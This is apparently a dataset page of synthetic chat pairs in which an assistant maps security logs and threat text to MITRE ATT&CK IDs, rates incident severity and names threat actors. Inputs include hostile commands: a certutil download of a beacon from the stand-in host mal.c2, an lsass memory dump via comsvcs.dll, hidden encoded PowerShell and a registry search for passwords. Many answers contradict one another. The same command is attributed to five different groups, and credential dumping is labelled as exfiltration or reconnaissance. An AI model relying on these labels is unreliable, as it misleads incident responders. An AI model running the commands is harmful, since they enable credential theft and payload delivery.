messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-1IP399YNLB)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-AHEMO86YLG)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Impact",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.27.117.251",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0005\"], \"techniques\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: OilRig has delivered macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"te... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-CQOUQ39CI5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Command and Control",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2028 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-OUH3IY8ZTC)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"Cri... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-9RL116V2C5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.169.213.251",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"tech... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: StoneDrill has several VBS scripts used throughout the malware's lifecycle.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}",
"role": "assista... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-FFMB49LVJO)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Credential Access",
"role": "user"
},
{
"con... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Devices in a local network segment communicate with each other by using link layer addresses.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1557\", \"T1557.... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Anchor has been signed with valid certificates to evade detection by security tools.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1553\", \"T1553.002\"]}",
"role":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-WPY9J94XKL)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.106.86.155",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: If the file does not exist, the Trojan will send the C2 server a message < File Not Found > by sending the following URL:http://<c2 domain>/resp?<hex(Environment.UserName/Environment.MachineName)>AAZ<hex(“< File Not Found >”)> If the f... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3563 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.34.116.87",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.68.205.8",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0011\", \"TA0002\"], \"tec... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-5WRFHW2E09)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"High\... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for newly constructed processes to match an existing service executables.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1574.005\", \"T1... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: T9000 gathers and beacons the MAC and IP addresses during installation.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The AES key is unique for each communication and is encrypted with one of two RSA public keys",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\"]}",
"role": "assi... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: WindTail has the ability to decrypt strings using hard-coded AES keys.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1599 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.127.231.50",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA000... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-L5SXNFUA4M)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Initial Access, Impact",
"role": "user"
},
{
"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-1CSGCGL3YF)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Defense Evasion",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-AXXFUVGUPJ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Discovery",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-XNKW2WHOXQ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Initial Access",
"role": "user"
},
{
"content": ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1645 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.156.104.193",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1071.001\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-VBWGH5YG1K)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.45.171.89",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1546... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The Delphi variant of Cannon does not use legitimate web-based email services for its C2 communications, instead opting to use email accounts at an actor owned domain, ambcomission[.]com",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-6058OP3D74)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.83.84.91",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techni... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.128.242.23",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.189.234.206",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.170.126.106",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0004\", \"TA0007\"], ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typh... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Cobalt Strike has the ability to load DLLs via reflective injection.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055\", \"T1055.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2035 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"con... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2607 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.185.1.114",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniq... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.33.250.51",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0005... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The Trojan uses the first four bytes of this hardware ID as a unique identifier for the system, which in our case was “0000”",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T108... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2531 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidenc... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-VJU1YXOTG0)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-6H9NPKJX7O)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.009\", \"T1546\"]}",
"role": "assis... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: gsecdump can dump Windows password hashes from the SAM.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.89.160.193",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"t... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-LECTWV9UJO)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Initial Access",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-Y65G6THSP7)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Credential Access",
"role": "user"
},
{
"content"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: looks for net and account or domain in close proximity",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-JQD6F2S63G)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Impact",
"role": "user"
},
{
"content"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.168.234.246",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: admin@338 has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 982 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: menuPass has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The attacker made use of Cobalt Strike’s “psexec” lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell",
"role": "user"
},
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.32.202.150",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Ensure critical system files as well as those known to be abused by adversaries have restrictive permissions and are owned by an appropriately privileged account, especially if access is not required by users nor will inhi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-5PXHBNHPZG)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-MV8181YFQY)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Reconnaissance, Credential Access",
"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-6QNA4CI5EA)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 543 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.84.240.36",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2786 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.41.144.152",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniq... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-3HQBT64IYT)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2882 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"co... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Bankshot searches for certain Registry keys to be configured before executing the payload.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"]}",
"role": "assista... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-P6IXU8B9LA)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Criti... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1567.002\", \"T1567\"]}",
"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattere... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\",... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3200 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.79.163.138",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-TH6FH9Z70D)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Impact, Discovery",
"role": "user"
},
{
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RTM can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.",
"role": "user"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-R3K0L9112X)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severit... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: reg query HKCU /f password /t REG_SZ /s",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-JLOZ1DPRGO)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access, Persistence",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1992 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.122.185.124",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"]... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Some Volgmer variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.",... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\[Windows architecture]\\Print Processors\\[user defined]\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-YBBRBZQK67)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.112.61.96",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: In at least some of these recent attacks, Buckeye used spear-phishing emails with a malicious .zip attachment",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.66.31.17",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-8Z76AA25PY)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Crit... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1627 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.193.7.83",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1484... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.